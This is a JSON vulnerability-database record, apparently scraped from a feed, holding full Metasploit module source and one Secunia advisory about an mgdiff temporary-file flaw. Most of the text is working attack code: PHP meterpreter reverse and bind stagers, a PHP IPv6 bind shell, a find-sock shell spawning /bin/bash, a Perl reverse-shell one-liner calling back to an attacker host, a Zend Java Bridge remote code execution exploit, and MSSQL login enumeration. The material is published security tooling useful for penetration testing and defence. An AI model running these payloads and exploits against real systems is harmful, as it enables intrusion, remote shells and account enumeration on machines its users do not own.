{"metasploit": [{"lastseen": "2019-11-27T15:37:30", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\n", "modified": "2017-09-12T13:53:31", "published": "2015-05-18T07:49:34", "id": "MSF:PAYLOAD/PHP/METERPRETER/REVERSE_TCP_UUID", "href": "", "type": "metasploit", "title": "PHP Meterpreter, PHP Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/php/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1290\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::ReverseTcp\n\n def self.handler_type_alias\n \"reverse_tcp_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Reverse TCP Stager',\n 'Description' => 'Reverse PHP connect back stager with checks for disabled functions',\n 'Author' => [ 'egypt', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' => {'Payload' => \"\"}\n ))\n end\n\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/reverse_tcp_uuid.rb"}, {"lastseen": "2019-12-12T03:48:32", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support\n", "modified": "2017-09-12T13:53:31", "published": "2015-05-18T07:49:34", "id": "MSF:PAYLOAD/PHP/METERPRETER/BIND_TCP_IPV6_UUID", "href": "", "type": "metasploit", "title": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/php/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1511\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::BindTcp\n\n def self.handler_type_alias\n \"bind_tcp_ipv6_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager IPv6 with UUID Support',\n 'Description' => 'Listen for a connection over IPv6 with UUID Support',\n 'Author' => [ 'egypt', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::BindTcp,\n 'Stager' => { 'Payload' => \"\" }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb"}, {"lastseen": "2019-11-29T22:09:50", "bulletinFamily": "exploit", "description": "This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-10T19:42:52", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ENUM_SQL_LOGINS", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration',\n 'Description' => %q{\n This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). Once logins have been enumerated, they can be used in dictionary attacks.\n },\n 'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],\n 'License' => MSF_LICENSE,\n 'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]\n ))\n\n register_options(\n [\n OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 300]),\n ])\n end\n\n def run\n # Check connection and issue initial query\n print_status(\"Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...\")\n if mssql_login_datastore\n print_good('Connected.')\n else\n print_error('Login was unsuccessful. Check your credentials.')\n disconnect\n return\n end\n\n # Query for sysadmin status\n print_status(\"Checking if #{datastore['USERNAME']} has the sysadmin role...\")\n user_status = check_sysadmin\n\n # Check if user has sysadmin role\n if user_status == 1\n print_good(\"#{datastore['USERNAME']} is a sysadmin.\")\n else\n print_status(\"#{datastore['USERNAME']} is NOT a sysadmin.\")\n end\n\n # Get a list if sql server logins using SUSER_NAME()\n print_status(\"Setup to fuzz #{datastore['FuzzNum']} SQL Server logins.\")\n print_status('Enumerating logins...')\n sql_logins_list = get_sql_logins\n if sql_logins_list.nil? || sql_logins_list.empty?\n print_error('Sorry, somethings went wrong - SQL Server logins were found.')\n disconnect\n return\n else\n # Print number of initial logins found\n print_good(\"#{sql_logins_list.length} initial SQL Server logins were found.\")\n\n sql_logins_list.sort.each do |sql_login|\n if datastore['VERBOSE']\n print_status(\" - #{sql_login}\")\n end\n end\n end\n\n # Verify the enumerated SQL Logins using sp_defaultdb error ananlysis\n print_status('Verifying the SQL Server logins...')\n sql_logins_list_verified = verify_logins(sql_logins_list)\n if sql_logins_list_verified.nil?\n print_error('Sorry, no SQL Server logins could be verified.')\n disconnect\n return\n else\n\n # Display list verified SQL Server logins\n print_good(\"#{sql_logins_list_verified.length} SQL Server logins were verified:\")\n sql_logins_list_verified.sort.each do |sql_login|\n print_status(\" - #{sql_login}\")\n end\n end\n\n disconnect\n end\n\n # Checks if user is a sysadmin\n def check_sysadmin\n # Setup query to check for sysadmin\n sql = \"select is_srvrolemember('sysadmin') as IsSysAdmin\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse query results\n parse_results = result[:rows]\n status = parse_results[0][0]\n\n # Return status\n return status\n end\n\n # Gets trusted databases owned by sysadmins\n def get_sql_logins\n # Create array to store the sql logins\n sql_logins = []\n\n # Fuzz the principal_id parameter passed to the SUSER_NAME function\n (1..datastore['FuzzNum']).each do |principal_id|\n # Setup query\n sql = \"SELECT SUSER_NAME(#{principal_id}) as login\"\n\n # Execute query\n result = mssql_query(sql)\n\n # Parse results\n parse_results = result[:rows]\n sql_login = parse_results[0][0]\n\n # Add to sql server login list\n sql_logins.push(sql_login) unless sql_logins.include?(sql_login)\n end\n\n # Return list of logins\n sql_logins\n end\n\n # Checks if user has the db_owner role\n def verify_logins(sql_logins_list)\n\n # Create array for later use\n verified_sql_logins = []\n\n fake_db_name = Rex::Text.rand_text_alpha_upper(24)\n\n # Check if the user has the db_owner role is any databases\n sql_logins_list.each do |sql_login|\n # Setup query\n sql = \"EXEC sp_defaultdb '#{sql_login}', '#{fake_db_name}'\"\n\n # Execute query\n result = mssql_query(sql)\n\n # Parse results\n parse_results = result[:errors]\n result = parse_results[0]\n\n # Check if sid resolved to a sql login\n if result.include?(fake_db_name)\n verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)\n end\n\n # Check if sid resolved to a sql login\n if result.include?('alter the login')\n # Add sql server login to verified list\n verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)\n end\n end\n\n verified_sql_logins\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb"}, {"lastseen": "2019-11-26T10:19:34", "bulletinFamily": "exploit", "description": "Listen for a connection and spawn a command shell via php (IPv6)\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-31T07:11:55", "id": "MSF:PAYLOAD/PHP/BIND_PHP_IPV6", "href": "", "type": "metasploit", "title": "PHP Command Shell, Bind TCP (via php) IPv6", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command Shell, Bind TCP (via php) IPv6',\n 'Description' => 'Listen for a connection and spawn a command shell via php (IPv6)',\n 'Author' => ['egypt', 'diaul <diaul[at]devilopers.org>',],\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # PHP Bind Shell\n #\n def php_bind_shell\n\n dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);\n shell = <<-END_OF_PHP_CODE\n #{php_preamble({:disabled_varname => dis})}\n $port=#{datastore['LPORT']};\n\n $scl='socket_create_listen';\n if(is_callable($scl)&&!in_array($scl,#{dis})){\n $sock=@$scl($port);\n }else{\n $sock=@socket_create(AF_INET6,SOCK_STREAM,SOL_TCP);\n $ret=@socket_bind($sock,0,$port);\n $ret=@socket_listen($sock,5);\n }\n $msgsock=@socket_accept($sock);\n @socket_close($sock);\n\n while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))\n {\n $o = '';\n $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);\n if(FALSE===$c){break;}\n if(substr($c,0,3) == 'cd '){\n chdir(substr($c,3,-1));\n } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\n break;\n }else{\n #{php_system_block({:cmd_varname=>\"$c\", :output_varname=>\"$o\", :disabled_varname => dis})}\n }\n @socket_write($msgsock,$o,strlen($o));\n }\n @socket_close($msgsock);\n END_OF_PHP_CODE\n\n return shell\n end\n\n #\n # Constructs the payload\n #\n def generate\n return super + php_bind_shell\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/bind_php_ipv6.rb"}, {"lastseen": "2019-11-27T14:55:01", "bulletinFamily": "exploit", "description": "This module abuses a flaw in the Zend Java Bridge Component of the Zend Server Framework. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. NOTE: This module has only been tested with the Win32 build of the software.\n", "modified": "2017-07-24T13:26:21", "published": "2011-04-01T22:01:46", "id": "MSF:AUXILIARY/ADMIN/ZEND/JAVA_BRIDGE", "href": "", "type": "metasploit", "title": "Zend Server Java Bridge Design Flaw Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',\n 'Description' => %q{\n This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.\n },\n 'Author' => [ 'ikki', 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '71420'],\n [ 'ZDI', '11-113' ],\n [ 'EDB', '17078' ],\n ],\n 'DisclosureDate' => 'Mar 28 2011'))\n\n register_options(\n [\n Opt::RPORT(10001),\n OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\\\metasploit.txt']),\n ])\n end\n\n def run\n\n cmd = datastore['CMD']\n\n connect\n\n java_object = [0x33000000].pack('V') + [0x00000000].pack('V')\n java_object << [0x0c000000].pack('V') + \"CreateObject\"\n java_object << [0x02000000].pack('V') + [0x00000004].pack('V')\n java_object << \"\\x11\" + \"java.lang.Runtime\" + \"\\x07\"\n java_object << [0x00000000].pack('V')\n\n print_status(\"Creating the Java Object 'java.lang.Runtime'\")\n sock.put(java_object)\n res = sock.get_once() || ''\n classid = res[5,4]\n\n runtime = [0x16000000].pack('V') + classid + [0x0a000000].pack('V')\n runtime << \"getRuntime\" + [0x00000000].pack('V')\n\n print_status(\"Invoking static method 'getRuntime()'\")\n sock.put(runtime)\n res = sock.get_once() || ''\n methodid = res[5,4]\n\n exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid\n exec << [0x04000000].pack('V') + \"exec\" + [0x01000000].pack('V')\n exec << \"\\x04\" + [0x00].pack('n') + [cmd.length].pack('n') + cmd\n\n print_status(\"Invoking method 'exec()' with parameter '#{cmd}'\")\n sock.put(exec)\n success = sock.get_once() || ''\n if (success =~ /\\x00\\x00\\x00/)\n print_status(\"Cleaning up the JVM\")\n rm = [0x11000000].pack('V') + [0xffffffff].pack('V')\n rm << [0x05000000].pack('V') + \"reset\"\n rm << [0x00000000].pack('V')\n sock.put(rm)\n else\n print_error(\"Failed to run command...\")\n disconnect\n return\n end\n\n disconnect\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/zend/java_bridge.rb"}, {"lastseen": "2019-11-26T10:23:05", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\n", "modified": "2017-09-12T13:53:31", "published": "2010-06-23T22:24:50", "id": "MSF:PAYLOAD/PHP/METERPRETER/REVERSE_TCP", "href": "", "type": "metasploit", "title": "PHP Meterpreter, PHP Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/php/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1116\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::ReverseTcp\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Reverse TCP Stager',\n 'Description' => 'Reverse PHP connect back stager with checks for disabled functions',\n 'Author' => 'egypt',\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' => {'Payload' => \"\"}\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/reverse_tcp.rb"}, {"lastseen": "2019-11-28T18:45:42", "bulletinFamily": "exploit", "description": "This module allows for the sending of arbitrary TNS commands in order to gather information. Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd\n", "modified": "2017-07-24T13:26:21", "published": "2009-07-14T16:48:56", "id": "MSF:AUXILIARY/ADMIN/ORACLE/TNSCMD", "href": "", "type": "metasploit", "title": "Oracle TNS Listener Command Issuer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TNS\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle TNS Listener Command Issuer',\n 'Description' => %q{\n This module allows for the sending of arbitrary TNS commands in order\n to gather information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd\n },\n 'Author' => ['MC'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Feb 1 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(1521),\n OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']),\n ])\n end\n\n def run\n\n begin\n connect\n\n command = datastore['CMD']\n\n pkt = tns_packet(command)\n\n print_status(\"Sending '#{command}' to #{rhost}:#{rport}\")\n sock.put(pkt)\n print_status(\"writing #{pkt.length} bytes.\")\n\n select(nil,nil,nil,0.5)\n\n print_status(\"reading\")\n res = sock.get_once(-1,5) || ''\n res = res.tr(\"[\\200-\\377]\",\"[\\000-\\177]\")\n res = res.tr(\"[\\000-\\027\\]\",\".\")\n res = res.tr(\"\\177\",\".\")\n print_status(res)\n\n disconnect\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n print_error e.message\n rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e\n print_error e.message\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/tnscmd.rb"}, {"lastseen": "2019-11-24T21:38:01", "bulletinFamily": "exploit", "description": "Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.\n", "modified": "2017-07-24T13:26:21", "published": "2008-09-24T04:41:51", "id": "MSF:PAYLOAD/PHP/SHELL_FINDSOCK", "href": "", "type": "metasploit", "title": "PHP Command Shell, Find Sock", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\nrequire 'msf/core/handler/find_shell'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command Shell, Find Sock',\n 'Description' => %Q{\n Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.\n },\n 'Author' => [ 'egypt' ],\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Handler' => Msf::Handler::FindShell,\n 'Session' => Msf::Sessions::CommandShell,\n 'Arch' => ARCH_PHP\n ))\n end\n\n def php_findsock\n\n var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n shell = <<END_OF_PHP_CODE\n#{php_preamble}\nprint(\"<html><body>\");\nflush();\n\nfunction mysystem(#{var_cmd}){\n #{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}\n return #{var_out};\n}\n\n#{var_fd} = 13;\nfor ($i = 3; $i < 50; $i++) {\n $foo = mysystem(\"/bin/bash 2>/dev/null <&$i -c 'echo $i'\");\n if ($foo != $i) {\n #{var_fd} = $i - 1;\n break;\n }\n}\nprint(\"</body></html>\\n\\n\");\nflush();\n\n#{var_cmd} = \"/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}\";\nmysystem(#{var_cmd});\n\nEND_OF_PHP_CODE\n\n\n return shell\n end\n\n #\n # Constructs the payload\n #\n def generate\n return php_findsock\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/shell_findsock.rb"}, {"lastseen": "2019-11-17T21:20:53", "bulletinFamily": "exploit", "description": "Creates an interactive shell via perl\n", "modified": "2017-07-24T13:26:21", "published": "2006-12-17T07:57:51", "id": "MSF:PAYLOAD/PHP/REVERSE_PERL", "href": "", "type": "metasploit", "title": "PHP Command, Double Reverse TCP Connection (via Perl)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command, Double Reverse TCP Connection (via Perl)',\n 'Description' => 'Creates an interactive shell via perl',\n 'Author' => 'cazz',\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # Constructs the payload\n #\n def generate\n buf = \"#{php_preamble}\"\n buf += \"$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');\"\n buf += \"#{php_system_block({:cmd_varname=>\"$c\"})}\"\n return super + buf\n\n end\n\n #\n # Returns the command string to use for execution\n #\n def command_string\n lhost = datastore['LHOST']\n ver = Rex::Socket.is_ipv6?(lhost) ? \"6\" : \"\"\n lhost = \"[#{lhost}]\" if Rex::Socket.is_ipv6?(lhost)\n cmd = \"perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\\"#{lhost}:#{datastore['LPORT']}\\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/reverse_perl.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nmgdiff Patch Viewer Insecure Temporary File Creation\r\n\r\nSECUNIA ADVISORY ID:\r\nSA17299\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/17299/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nPrivilege escalation\r\n\r\nWHERE:\r\nLocal system\r\n\r\nSOFTWARE:\r\nmgdiff Patch Viewer\r\nhttp://secunia.com/product/5962/\r\n\r\nDESCRIPTION:\r\nJavier Fernandez-Sanguino Pena has reported a vulnerability in mgdiff\r\nPatch Viewer, which can be exploited by malicious, local users to\r\nperform certain actions on a vulnerable system with escalated\r\nprivileges.\r\n\r\nThe vulnerability is caused due to "viewpatch" script creating\r\ntemporary files insecurely in "/tmp". This can be exploited via\r\nsymlink attacks to create or overwrite arbitrary files with the\r\nprivileges of the user running the affected script.\r\n\r\nSOLUTION:\r\nGrant only trusted users access to affected systems.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nJavier Fernandez-Sanguino Pena\r\n\r\nORIGINAL ADVISORY:\r\nDebian:\r\nhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=335188\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-10-24T00:00:00", "published": "2005-10-24T00:00:00", "id": "SECURITYVULNS:DOC:10012", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10012", "title": "[SA17299] mgdiff Patch Viewer Insecure Temporary File Creation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}